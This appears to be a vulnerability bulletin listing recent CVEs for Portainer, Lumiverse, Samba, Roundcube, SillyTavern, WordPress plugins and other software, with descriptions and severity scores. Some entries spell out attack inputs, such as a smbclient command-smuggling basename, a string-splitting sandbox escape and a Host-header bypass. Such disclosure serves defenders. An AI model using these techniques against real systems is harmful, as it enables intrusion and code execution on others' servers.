| portainer--portainer | Portainer Community Edition is a lightweight service delivery platform for containerized applications that can be used to manage Docker, Swarm, Kubernetes and ACI environments. From 2.33.0 to before 2.33.8, 2.39.2, and 2.41.0, Portainer offers an environment-level Disable bind mounts for non-administrators security setting that blocks regular users from binding host paths into containers they create through the Portainer-mediated Docker API. The check that enforces this setting only inspected the legacy HostConfig.Binds array on the container-create proxy and never looked at the equivalent HostConfig.Mounts array. Any authenticated user with rights to create containers on a Docker environment where the restriction is enabled could submit a bind-typed entry under HostConfig.Mounts and mount any host path into their container. This vulnerability is fixed in 2.33.8, 2.39.2, and 2.41.0. | 2026-05-28 | 8.5 | CVE-2026-44850 |
| portainer--portainer | Portainer Community Edition is a lightweight service delivery platform for containerized applications that can be used to manage Docker, Swarm, Kubernetes and ACI environments. From 2.33.0 to before 2.33., Portainer proxies requests to Kubernetes clusters through a middleware layer (kubeClientMiddleware) that validates the requesting user's token before forwarding traffic to the cluster. When security.RetrieveTokenData returned an error, the middleware wrote an HTTP 403 response but was missing a return statement - execution continued into the handler with a nil tokenData value. The Kubernetes endpoints sit behind Portainer's outer AuthenticatedAccess bouncer, so an attacker requires a valid Portainer session. However, a user whose secondary token validation fails in kubeClientMiddleware - for example a user without permission to access a given Kubernetes endpoint - would have their request forwarded to the cluster anyway, bypassing the authorization check. The same defect was present in both the CE and EE codebases. This vulnerability is fixed in 2.33.8. | 2026-05-28 | 8.1 | CVE-2026-44882 |
| prolix-oc--Lumiverse | Lumiverse is a full-featured AI chat application. Prior to 0.9.7, the Spindle extension build pipeline calls bun install without the --ignore-scripts flag before running the static backend safety scan (assertSafeBackendBundle). A malicious extension that ships a package.json with a preinstall, postinstall, or prepare lifecycle script achieves host-level code execution the moment an admin presses Install before any dist file is inspected. This vulnerability is fixed in 0.9.7. | 2026-05-26 | 9.1 | CVE-2026-44444 |
| prolix-oc--Lumiverse | Lumiverse is a full-featured AI chat application. Prior to 0.9.7, when the primary toSmbPath(fullPath) call throws, the method falls back to a dirname/basename split and only validates the directory prefix. The basename is concatenated directly into the smbclient -c script without validation. smbclient interprets ; as a subcommand separator and !cmd as a local-shell escape that runs cmd on the host. A path whose directory component is clean but whose basename contains "; !<cmd>; echo " achieves arbitrary command execution on the Lumiverse server. This vulnerability is fixed in 0.9.7. | 2026-05-26 | 9.1 | CVE-2026-44449 |
| prolix-oc--Lumiverse | Lumiverse is a full-featured AI chat application. Prior to 0.9.7, the MCP server creation endpoint validates the command field against an allowlist of binary names but forwards the args array to the child process without any validation. Every binary on the allowlist accepts an inline-code execution flag (-e for node/bun, -c for python3/deno), giving any logged-in user arbitrary OS-level code execution on the Lumiverse server. The route requires only requireAuth (not requireOwner). The server binds on all interfaces (::) and the host-header rebinding check is bypassed trivially by any HTTP client that sends Host: localhost:<port> directly, making this exploitable from any machine with network access to the server port. This vulnerability is fixed in 0.9.7. | 2026-05-26 | 9.9 | CVE-2026-44450 |
| prolix-oc--Lumiverse | Lumiverse is a full-featured AI chat application. Prior to 0.9.7, the component override system transpiles user-supplied TSX via Sucrase and evaluates it with new Function, shadowing dangerous globals (fetch, window, eval, etc.) with undefined. A static source validator (validateComponentOverrideSource) additionally blocks these identifiers by word-boundary regex. Both controls are bypassed. String-split bypass of the static validator: any blocked identifier can be reconstructed at runtime from string fragments ('ownerDoc' + 'ument'). DOM ref escape from the sandbox: useRef and useEffect are provided in scope. A ref attached to a rendered element gives a live DOM node. From any real DOM node, node['ownerDoc'+'ument']['def'+'aultView'] yields the real window, bypassing all identifier shadows. Theme packs (.lumitheme / .lumiverse-theme) are the shareable delivery mechanism. A malicious pack is an exploit path: the victim imports the file, enables one component override in the Theme Editor, and the payload fires in their authenticated session. This vulnerability is fixed in 0.9.7. | 2026-05-26 | 9.3 | CVE-2026-44451 |
| Property Hive--PropertyHive | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Property Hive PropertyHive propertyhive allows DOM-Based XSS. This issue affects PropertyHive: from n/a through <= 2.2.2. | 2026-05-27 | 7.1 | CVE-2026-42729 |
| pyload--pyload | pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, the packages.js template at src/pyload/webui/app/themes/modern/templates/js/packages.js:172 interpolates a stored link URL into a template literal inside single-quoted HTML and then writes the result to the DOM via $(div).html(html). No escaping runs between the API value and innerHTML. An attacker (Alice) who can submit a package link puts a single quote plus event handler into the URL, breaks out of the attribute, and executes JavaScript in every operator's browser that opens the downloads view. The theme does not set a Content Security Policy that restricts inline script or event handlers. This vulnerability is fixed in 0.5.0b3.dev100. | 2026-05-28 | 8.7 | CVE-2026-45348 |
| rancher--local-path-provisioner | Local Path Provisioner provides a way for the Kubernetes users to utilize the local storage in each node. Prior to 0.0.36, a malicious user with permission to edit the local-path-config ConfigMap in the local-path-storage namespace can manipulate the helperPod.yaml template used by rancher/local-path-provisioner. The helperPod.yaml template is loaded by the provisioner and used to create HelperPods during PVC provisioning and cleanup operations. However, the template is not sufficiently validated before use. Security-sensitive fields such as securityContext.privileged, hostPath volumes, and Linux capabilities can be injected into the template. When a PVC operation triggers HelperPod creation, the provisioner creates the HelperPod using the attacker-controlled template. This can result in a privileged pod running on the target node with the host root filesystem mounted. This may allow the attacker to access sensitive host files, read ServiceAccount tokens from other pods on the same node, access other tenants' local-path volume data, or modify files on the host node. This vulnerability is fixed in 0.0.36. | 2026-05-28 | 8.7 | CVE-2026-44543 |
| ranfdev--deepobj | deepobj provides get, set, delete deep objects in javascript. Prior to 1.0.3, prototype pollution is possible when property paths contain __proto__/constructor/prototype. The property path must not be exposed as user input. This vulnerability is fixed in 1.0.3. | 2026-05-28 | 8.2 | CVE-2026-46509 |
| RealMag777--Active Products Tables for WooCommerce | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in RealMag777 Active Products Tables for WooCommerce profit-products-tables-for-woocommerce allows Blind SQL Injection. This issue affects Active Products Tables for WooCommerce: from n/a through <= 1.0.8. | 2026-05-27 | 9.3 | CVE-2026-42727 |
| RealMag777--Active Products Tables for WooCommerce | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in RealMag777 Active Products Tables for WooCommerce profit-products-tables-for-woocommerce allows Blind SQL Injection. This issue affects Active Products Tables for WooCommerce: from n/a through <= 1.0.9. | 2026-05-27 | 9.3 | CVE-2026-42761 |
| RealMag777--TableOn | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in RealMag777 TableOn posts-table-filterable allows Blind SQL Injection. This issue affects TableOn: from n/a through <= 1.0.5.1. | 2026-05-27 | 9.3 | CVE-2026-42755 |
| RealMag777--WPCS | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RealMag777 WPCS currency-switcher allows DOM-Based XSS. This issue affects WPCS: from n/a through <= 1.3.1. | 2026-05-27 | 7.1 | CVE-2026-42733 |
| Red Hat--Pen Drive Powered by Red Hat Lightspeed | A command injection vulnerability was discovered in the `rpmuncompress` utility of RPM. When extracting certain archive formats (ZIP, 7z, GEM) to a specified destination directory, the tool inserts the archive's top-level folder name into a shell command without properly sanitizing it. A specially crafted archive containing shell metacharacters in its folder name can execute arbitrary commands as the user running the extraction. | 2026-05-28 | 7 | CVE-2026-44604 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak's Fine-Grained Admin Permissions (FGAPv2) feature. An administrator with limited client management permissions can exploit this vulnerability to assign any realm role, including highly privileged roles, to a client's scope mapping. This bypasses intended security controls, allowing the injected role to be projected into a user's authentication token when they access the modified client. This could lead to unauthorized privilege escalation within the Keycloak realm. | 2026-05-28 | 7.3 | CVE-2026-9795 |
| Red Hat--Red Hat Container Native Virtualization 4.12 | A flaw was found in KubeVirt's virt-handler component. This vulnerability allows an authenticated OpenShift user with edit permissions in a single namespace to exploit improper symlink validation when connecting to virtual machine console sockets. By replacing the console socket with a symlink to the host's container runtime (CRI-O) socket, an attacker can hijack virt-handler's privileged connection. This enables the attacker to access any Unix socket on the host, potentially leading to full control of the node and the entire cluster. | 2026-05-26 | 9.9 | CVE-2026-7374 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in Samba. A remote attacker can exploit a misconfiguration in Samba file servers and classic domain controllers that use the "check password script" feature. If this script is configured with the %u substitution character, the client-controlled username is passed without proper escaping of shell meta-characters. This vulnerability allows an attacker to achieve remote command execution on the affected system. This issue primarily affects non-standard configurations where the "check password script" is used with %u and the samba-dcerpcd service is started as a system service. | 2026-05-28 | 9 | CVE-2026-4408 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in Samba's certificate auto-enrollment Group Policy handling. When certificate auto-enrollment is enabled, Samba may retrieve a CA certificate over an unencrypted HTTP connection and install it into the local trust store without proper verification. An attacker with the ability to intercept or redirect network traffic could exploit this behavior to supply a malicious certificate authority certificate, potentially allowing interception or spoofing of trusted communications. | 2026-05-27 | 8 | CVE-2026-3012 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in the Samba printing subsystem. Samba passes the client-controlled job description string to the command configured with the "print command" setting via the "%J" substitution character without escaping shell meta characters. A remote attacker could exploit this vulnerability by sending a specially crafted print job description that contains unescaped shell characters. This could lead to remote code execution on the affected system. | 2026-05-26 | 8.5 | CVE-2026-4480 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in Samba's handling of NTFS-style reparse points on shares configured with read only = yes. Due to missing SMB-layer access checks, authenticated users with underlying filesystem write permissions may create or delete reparse point metadata through SMB operations even on read-only exports. This could allow modification of SMB-visible file behavior, including converting files into symbolic links or other reparse point types. | 2026-05-27 | 7.1 | CVE-2026-1933 |
| Red Hat--Red Hat Enterprise Linux 8 | A flaw was found in gnutls. When validating certificates, an oversized Subject Alternative Name (SAN) could cause the validation process to incorrectly fall back to checking the Common Name (CN) field. This could allow a remote attacker to bypass proper certificate validation, potentially leading to spoofing or man-in-the-middle attacks. | 2026-05-26 | 8.2 | CVE-2026-42013 |
| Red Hat--Red Hat Enterprise Linux 8 | A flaw was found in libgnutls. A remote attacker, by sending an extremely short premaster secret during an RSA key exchange to a server using an RSA key backed by a PKCS#11 token, could trigger a short heap overread. This memory corruption vulnerability could lead to information disclosure. | 2026-05-26 | 8.2 | CVE-2026-5260 |
| Red Hat--Red Hat Enterprise Linux 8 | A flaw was found in gnutls. A remote attacker could exploit this vulnerability by presenting a specially crafted certificate that contains Uniform Resource Identifier (URI) or Service (SRV) Subject Alternative Names (SANs). This could cause the certificate validation process to incorrectly fall back to checking DNS hostnames against the Common Name (CN), potentially allowing the attacker to spoof legitimate services or intercept sensitive information. | 2026-05-26 | 7.1 | CVE-2026-42012 |
| Red Hat--Red Hat Hardened Images | A flaw was found in libsolv. This heap buffer overflow occurs during the decompression of attacker-controlled compressed data within `.solv` files due to insufficient input validation. An attacker can provide a specially crafted `.solv` file, which, when processed by a vulnerable application, can lead to out-of-bounds memory access. This could result in information disclosure, alteration of program execution, or a denial of service. | 2026-05-26 | 7.8 | CVE-2026-48864 |
| Red Hat--Red Hat OpenShift Container Platform 4 | A flaw was found in the OpenShift Router. A user with EndpointSlice write access can exploit this vulnerability by creating a Service backed by an FQDN (Fully Qualified Domain Name) EndpointSlice that resolves to a cloud metadata endpoint. This allows the router to proxy requests to the cloud metadata endpoint, leading to the disclosure of instance credentials and other sensitive metadata. This bypasses previous security measures for validating IP addresses. | 2026-05-29 | 7.7 | CVE-2026-42965 |
| Red Hat--Red Hat OpenShift Container Platform 4 | A flaw was found in the OpenShift Router. When a Route has `insecureEdgeTerminationPolicy` set to Allow, the HTTP frontend does not remove `X-SSL-Client-*` headers from incoming requests. This allows an unauthenticated attacker to send plain HTTP requests with crafted `X-SSL-Client-*` headers. As a result, backends relying on these headers for mutual TLS (Transport Layer Security) authentication can be bypassed, enabling the attacker to impersonate client certificate identities. | 2026-05-29 | 7.4 | CVE-2026-46579 |
| Red Hat--Red Hat OpenShift Virtualization 4 | A flaw was found in KubeVirt's virt-exportserver component. An attacker with specific namespace-level access can exploit a path traversal vulnerability in the VMExport directory endpoint. By placing a symbolic link (symlink) within an exported filesystem Persistent Volume Claim (PVC) that points outside its designated mount root, the attacker can read arbitrary files from the exporter pod's filesystem. This leads to information disclosure, potentially exposing sensitive data. | 2026-05-28 | 7.7 | CVE-2026-9804 |
| revmakx--Backup and Staging by WP Time Capsule | Authentication Bypass Using an Alternate Path or Channel vulnerability in revmakx Backup and Staging by WP Time Capsule wp-time-capsule allows Password Recovery Exploitation. This issue affects Backup and Staging by WP Time Capsule: from n/a through <= 1.22.25. | 2026-05-27 | 7.5 | CVE-2026-42760 |
| RiceTheme--Felan Framework | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RiceTheme Felan Framework allows Reflected XSS. This issue affects Felan Framework: from n/a through 1.1.3. | 2026-05-27 | 7.1 | CVE-2025-22741 |
| riebl--vanetza | Vanetza is an open-source implementation of the ETSI C-ITS protocol suite. In 26.02 and earlier, a denial-of-service vulnerability was identified in the ASN.1/OER parsing pipeline of Vanetza. When processing malformed network packets containing corrupted ASN.1/OER structures (e.g., invalid length fields or malformed certificate encoding), the ASN.1 wrapper (asn1c_wrapper.cpp) raises a std::runtime_error. This exception is not caught at the parsing boundary and propagates to std::terminate, resulting in process termination. This vulnerability is fixed with commit 62dfe58a8342512b6e1947d75821402ada524f1a. | 2026-05-26 | 7.5 | CVE-2026-43988 |
| riebl--vanetza | Vanetza is an open-source implementation of the ETSI C-ITS protocol suite. In 26.02 and earlier, a denial-of-service vulnerability was identified in the cryptographic verification pipeline of Vanetza. When processing incoming V2X messages, the ASN.1 decoder accepts the structure as syntactically valid. However, this reveals a logic-based protocol failure where semantic constraints on specific fields are only strictly enforced during OER re-encoding. Specifically, if a crafted packet contains a certificate where the Psid (Provider Service Identifier) sub-type violates subtype constraints (e.g., out-of-range or invalid CHOICE variant), it is accepted during initial parsing, where subtype constraints are not enforced. Later, when StraightVerifyService attempts to calculate a message hash for cryptographic verification, it must re-encode the signing certificate. The underlying ASN.1 wrapper (asn1c_wrapper.cpp) detects the semantic violation during encoding and raises a std::runtime_error. This exception is not caught within the encoding path and propagates to std::terminate, resulting in immediate process termination. This vulnerability is fixed with commit e1a2e2709210d309458c3d77f98d50dec26c0df0. | 2026-05-26 | 7.5 | CVE-2026-44905 |
| robertpeake--Login No Captcha reCAPTCHA | The Login No Captcha reCAPTCHA plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `$_SERVER['PHP_SELF']` superglobal in all versions up to, and including, 1.8.0. This is due to the `authenticate()` function storing the unsanitized output of `basename($_SERVER['PHP_SELF'])` in the `login_nocaptcha_error` WordPress option when a login attempt is made from a non-standard login page (e.g., xmlrpc.php). The `admin_notices()` function then echoes this stored value directly into the admin dashboard HTML without escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that execute when an administrator with a whitelisted IP address visits the WordPress dashboard within 30 seconds of the attack. | 2026-05-28 | 7.2 | CVE-2026-2374 |
| Roundcube--Webmail | Roundcube Webmail 1.6.x before 1.6.16 and 1.7.x before 1.7.1 has Pre-authentication SQL injection in the virtuser_query plugin via a preg_replace() backslash escape bypass. | 2026-05-25 | 8.1 | CVE-2026-48842 |
| Roundcube--Webmail | Roundcube Webmail 1.6.x between 1.6.14 and 1.6.16, and 1.7.x before 1.7.1, has insufficient Cascading Style Sheets (CSS) sanitization in HTML e-mail messages that may lead to SSRF or information disclosure, e.g., if stylesheet links point to local network hosts. The issue stems from an insufficient fix for CVE-2026-35540. | 2026-05-25 | 7.2 | CVE-2026-48843 |
| Roundcube--Webmail | Roundcube Webmail 1.6.x before 1.6.16 and 1.7.x before 1.7.1 has insecure code evaluation logic in the LDAP autovalues option that could lead to code injection. (Support for code evaluation has been removed in 1.6.16 and 1.7.1.) | 2026-05-25 | 7.5 | CVE-2026-48844 |
| Roundcube--Webmail | Roundcube Webmail 1.6.x before 1.6.16 and 1.7.x before 1.7 has insufficient HTML sanitization that could lead to Cascading Style Sheets (CSS) injection via an SVG document that has an animate element with the attributeName attribute. | 2026-05-25 | 7.2 | CVE-2026-48848 |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. Prior to 1.0.0-beta.2, the internode RPC layer authenticates every request with an HMAC-SHA256 signature using a shared secret. The function that produces this secret, get_shared_secret() in crates/ecstore/src/rpc/http_auth.rs, falls back to the public, source-tree-embedded DEFAULT_SECRET_KEY = "rustfsadmin" when neither the RUSTFS_RPC_SECRET environment variable nor the global S3 secret key has been configured. This vulnerability is fixed in 1.0.0-beta.2. | 2026-05-28 | 9.8 | CVE-2026-45039 |
| Saleswonder Team: Tobias--WebinarIgnition | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Saleswonder Team: Tobias WebinarIgnition webinar-ignition allows Path Traversal. This issue affects WebinarIgnition: from n/a through < 4.08.253. | 2026-05-27 | 9.9 | CVE-2026-42757 |
| Saleswonder Team: Tobias--WebinarIgnition | Incorrect Privilege Assignment vulnerability in Saleswonder Team: Tobias WebinarIgnition webinar-ignition allows Privilege Escalation. This issue affects WebinarIgnition: from n/a through < 4.08.253. | 2026-05-27 | 9.8 | CVE-2026-42758 |
| sambitraj--STUDENT-MANAGEMENT-SYSTEM | A flaw has been found in sambitraj STUDENT-MANAGEMENT-SYSTEM 1.0. This impacts an unknown function of the component Login Page. Executing a manipulation of the argument email can lead to sql injection. The attack may be performed from remote. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-30 | 7.3 | CVE-2026-10111 |
| sambitraj--STUDENT-MANAGEMENT-SYSTEM | A vulnerability has been found in sambitraj STUDENT-MANAGEMENT-SYSTEM up to 56ba287f2e9031523ccb4244cb6e3fe530e4e5d5. The affected element is an unknown function of the component Dashboard. Such manipulation leads to improper access controls. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. Multiple endpoints are affected. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-26 | 7.3 | CVE-2026-9562 |
| Samsung Open Source--Escargot | Out-of-bounds write vulnerability in Samsung Open Source Escargot allows Overflow Buffers. This issue affects Escargot: 36f5fb58366a67b713c02f6fd985e924fcc09e31. | 2026-05-28 | 8.8 | CVE-2026-8915 |
| sbthemes--WooCommerce Infinite Scroll and Ajax Pagination | The WooCommerce Infinite Scroll and Ajax Pagination plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.8 via the 'settings' parameter in the 'import_settings' function. This is due to deserialization of untrusted data supplied via the import configuration feature without capability checks. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject a PHP Object. No POP chain is present within the vulnerable plugin itself, but if a POP chain is present via an additional plugin or theme installed on the target system, it could allow an attacker to delete arbitrary files, retrieve sensitive data, or execute code. | 2026-05-29 | 8.8 | CVE-2025-11993 |
| ScadaBR--ScadaBR | Exposed methods allow authenticated users to create and execute arbitrary JavaScript code on the server. The scripts execute with full access, enabling complete system compromise as commands are executed as root. | 2026-05-28 | 9.9 | CVE-2026-9645 |
| SDMC Technology Co., Ltd--NE6037 | SDMC NE6037 cable modem routers running firmware 7.1.6.0.25 and 7.1.6.1.9_B9 contain a hardcoded password vulnerability in the web management interface recovery endpoints (mgmt.php, npcmd.php) that allows unauthenticated attackers to gain root access by submitting the hardcoded credential to the recovery endpoint via HTTP. Attackers can leverage this hardcoded password to enable filtered SSH and Telnet services on the device, resulting in unauthenticated root-level remote access to the underlying system. | 2026-05-28 | 9.8 | CVE-2026-24444 |
| sebhildebrandt--systeminformation | systeminformation is a System and OS information library for node.js. From 4.17.0 to 5.31.5, on Linux, systeminformation is vulnerable to command injection in networkInterfaces() when an active NetworkManager connection profile name contains shell metacharacters. The vulnerable value is obtained internally from real nmcli device status output. The library sanitizes the network interface name before using it in shell commands, but it does not apply equivalent sanitization to the parsed NetworkManager connection profile name. That unsanitized connectionName is then interpolated into three shell command strings executed through execSync(). This vulnerability is fixed in 5.31.6. | 2026-05-27 | 7.8 | CVE-2026-44724 |
| SeedProd LLC--SeedProd Pro | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in SeedProd LLC SeedProd Pro allows PHP Local File Inclusion. This issue affects SeedProd Pro: from n/a before 6.19.5. | 2026-05-27 | 7.5 | CVE-2026-48972 |
| servo--smallbitvec | smallbitvec is a growable bit-vector for Rust, optimized for size. From 1.0.1 to 2.6.0, an integer overflow in the internal capacity calculation of smallbitvec can lead to an undersized heap allocation, resulting in a heap buffer overflow through safe APIs only. This allows memory corruption without requiring unsafe code from the caller. This vulnerability is fixed in 2.6.1. | 2026-05-26 | 7.3 | CVE-2026-44983 |
| shabti--Frontend Admin by DynamiApps | The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to unauthenticated privilege escalation in versions up to and including 3.29.2. This is due to insecure form submission handling that accepts arbitrary form definitions from user input instead of securely loading them from the backend. When $_POST['_acf_form'] is an array (rather than a form ID), the validate_form() function bypasses database lookup and directly processes the attacker-controlled structure. The create_record() function preserves attacker-supplied record data if present, and the user action's run() function falls back to attacker-controlled field definitions from $form['fields'] when legitimate fields cannot be found. The role field's pre_update_value() validation reads $field['role_options'] from this attacker-controlled definition, allowing an attacker to specify ['administrator'] as an allowed role and bypass the security check. This makes it possible for unauthenticated attackers to create administrator accounts by injecting a custom form configuration with a spoofed role field. | 2026-05-28 | 8.8 | CVE-2026-6226 |
| shabti--Frontend Admin by DynamiApps | The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 3.29.2. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to overwrite an administrator's user_pass, user_email, first_name, last_name, and other profile fields by supplying an arbitrary ?user_id= value, enabling full administrator account takeover via direct password replacement or email-redirect password reset. Exploitation requires the targeted Edit-User form to have its 'Roles' configuration setting left empty; when a non-empty roles list is configured, load_data() sets the user ID to 'none' for users whose roles fall outside the allowed list, preventing administrators from being targeted through that form. | 2026-05-28 | 8.8 | CVE-2026-7802 |
| shazdeh--Query Shortcode | The Query Shortcode plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 0.2.1 via the shortcode function. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included. | 2026-05-27 | 7.5 | CVE-2026-9200 |
| Shenzhen Sixun Software--Sixun Shanghui Group Business Management System | A vulnerability was found in Shenzhen Sixun Software Sixun Shanghui Group Business Management System 10. Affected by this vulnerability is an unknown functionality of the file /api/Dinner/PayConfig. Performing a manipulation of the argument tableno results in sql injection. The attack is possible to be carried out remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-26 | 7.3 | CVE-2026-9544 |
| shepherdwind--velocity.js | Velocity.js is a JavaScript implementation of the Apache Velocity template engine. In 2.1.5 and earlier, a prototype pollution vulnerability was discovered in velocityjs. This issue occurs during the processing of #set directives in Velocity templates. If an application renders a template controlled by an attacker, it is possible to modify Object.prototype, potentially leading to Denial of Service (DoS) or Remote Code Execution (RCE) depending on the server environment. | 2026-05-26 | 8.3 | CVE-2026-44966 |
| sherlock-project--sherlock | Sherlock hunts down social media accounts by username across social networks. Prior to 0.16.1, the GitHub Actions workflow validate_modified_targets.yml is vulnerable to command injection via the pull_request_target trigger. Any GitHub user can execute arbitrary commands on the CI runner and exfiltrate the GITHUB_TOKEN by opening a pull request. No approval, review, or merge is required. This vulnerability is fixed in 0.16.1. | 2026-05-27 | 9.3 | CVE-2026-44590 |
| Shibby--Tomato | A weakness has been identified in Shibby Tomato 1.28. This vulnerability affects the function get_ups_field of the file tomatodata.cgi. Executing a manipulation of the argument Date can lead to stack-based buffer overflow. It is possible to launch the attack remotely. This project is superseded by FreshTomato. This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-29 | 8.8 | CVE-2026-10065 |
| Shibby--Tomato | A security vulnerability has been detected in Shibby Tomato up to 1.28. This issue affects the function sub_9068 of the file tomatoups.cgi of the component UPS Service. The manipulation leads to stack-based buffer overflow. The attack can be initiated remotely. This project is superseded by FreshTomato. This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-29 | 8.8 | CVE-2026-10066 |
| Shibby--Tomato | A vulnerability was detected in Shibby Tomato 1.28. Impacted is the function sub_90F0 of the file multimon.cgi. The manipulation results in stack-based buffer overflow. The attack can be launched remotely. This project is superseded by FreshTomato. This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-29 | 8.8 | CVE-2026-10067 |
| Shibby--Tomato | A vulnerability was determined in Shibby Tomato up to 1.28. Affected is the function rip_zebra_read_ipv4 of the file /usr/sbin/ripd of the component Zserv Handler. Executing a manipulation can lead to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. This project is superseded by FreshTomato. This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-30 | 8.8 | CVE-2026-10124 |
| Shibby--Tomato | A flaw has been found in Shibby Tomato 1.28. The affected element is the function send of the file usr/sbin/miniupnpd of the component SUBSCRIBE Call Handler. This manipulation causes server-side request forgery. The attack may be initiated remotely. This project is superseded by FreshTomato. This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-29 | 7.3 | CVE-2026-10068 |
| Shibby--Tomato | A vulnerability has been found in Shibby Tomato 1.28. The impacted element is an unknown function of the file usr/sbin/miniupnpd. Such manipulation leads to resource consumption. The attack may be launched remotely. This project is superseded by FreshTomato. This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-29 | 7.5 | CVE-2026-10069 |
| shopperlabs--shopper | Shopper is a Headless e-commerce Admin Panel. Prior to 2.8.0, two distinct authorization defects in the team settings allowed any authenticated panel user to take over the RBAC system. Settings/Team/Index had no mount() authorization. Any authenticated user could load the page and use its public actions to create new roles and delete other users, including administrators. Settings/Team/RolePermission gated its write actions on the read-only view_users permission. Any user holding view_users could grant themselves or any other user arbitrary permissions, including manage_users and edit_orders, effectively escalating to full panel administrator from a read-only account. Combined, these two defects allow a low-privilege authenticated user to obtain administrator privileges and remove the legitimate administrators from the panel. This vulnerability is fixed in 2.8.0. | 2026-05-29 | 9.9 | CVE-2026-47744 |
| shopperlabs--shopper | Shopper is a Headless e-commerce Admin Panel. Prior to 2.8.0, Multiple Filament actions on the admin Order detail and Order shipments table were callable by an authenticated low-privilege user without the permission required to mutate orders. The order detail actions cancel, mark paid, mark complete, capture payment, archive, and start processing were callable with the read-only read_orders permission and did not require edit_orders. capturePayment could trigger an actual PSP capture (real funds movement). The order shipments table actions mark delivered and edit tracking were callable with the read-only browse_orders permission. A user with read access to orders could therefore alter the lifecycle of every order in the panel and trigger real-world payment captures. This vulnerability is fixed in 2.8.0. | 2026-05-29 | 8.1 | CVE-2026-47740 |
| silabs.com--Simplicity SDK | An attacker is able to downgrade the security of a Bluetooth LE connection by deleting an existing bond, spoofing the bonded device and creating a new bond. | 2026-05-26 | 8.8 | CVE-2026-8676 |
| SillyTavern--SillyTavern | SillyTavern is a locally installed user interface that allows users to interact with text generation large language models, image generation engines, and text-to-speech voice models. Prior to 1.18.0, SillyTavern accepts Remote-User (Authelia) and X-Authentik-Username (Authentik) HTTP headers to automatically log in users when SSO is configured. There is no validation that these headers originate from a trusted reverse proxy. Any network client that can reach the SillyTavern port directly can inject these headers and authenticate as any user, including administrators, without a password. This vulnerability is exploitable only when sso.autheliaAuth: true or sso.authentikAuth: true is set in config.yaml (both default to false). This vulnerability is fixed in 1.18.0. | 2026-05-29 | 9.8 | CVE-2026-44649 |
| SillyTavern--SillyTavern | SillyTavern is a locally installed user interface that allows users to interact with text generation large language models, image generation engines, and text-to-speech voice models. Prior to 1.18.0, POST /api/extensions/delete endpoint accepts extensionName: "." which bypasses sanitize-filename validation, causing the entire user extensions directory to be recursively deleted. No authentication is required in the default configuration. This vulnerability is fixed in 1.18.0. | 2026-05-29 | 9.1 | CVE-2026-44650 |
| SillyTavern--SillyTavern | SillyTavern is a locally installed user interface that allows users to interact with text generation large language models, image generation engines, and text-to-speech voice models. Prior to 1.18.0, SillyTavern exposes /api/search/searxng, which accepts attacker-controlled baseUrl and uses it directly to build outbound server-side fetches. An authenticated low-privilege user can point baseUrl at an internal or loopback HTTP service and receive the /search response body. This vulnerability is fixed in 1.18.0. | 2026-05-29 | 8.5 | CVE-2026-46372 |
| SillyTavern--SillyTavern | SillyTavern is a locally installed user interface that allows users to interact with text generation large language models, image generation engines, and text-to-speech voice models. Prior to 1.18.0, SillyTavern relies on cookie-session for authentication, storing all session data (user handle, permissions) in a signed cookie. The endpoints POST /api/users/change-password and POST /api/users/recover-step2 only update the password hash in the database but do not expire current sessions. Because the session is stateless and stored entirely in the client cookie, there is no server-side mechanism to revoke a token once issued. This vulnerability is fixed in 1.18.0. | 2026-05-29 | 7.5 | CVE-2026-44648 |
| Simpkh--SIM-PKH | SIM-PKH 2.4.1 contains an arbitrary file upload vulnerability that allows authenticated attackers to upload malicious files by submitting PHP code through the fupload parameter. Attackers can upload PHP files via the aksi_pengurus.php endpoint with module=pengurus and act=update parameters, which are stored in the foto directory and executed as web scripts. | 2026-05-30 | 8.8 | CVE-2018-25409 |
| Simpkh--SIM-PKH | SIM-PKH 2.4.1 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'id' parameter. Attackers can send GET requests to /admin/media.php with module=pengurus and act=editpengurus parameters containing SQL UNION statements to extract database information including usernames, database names, and version details. | 2026-05-30 | 7.1 | CVE-2018-25410 |
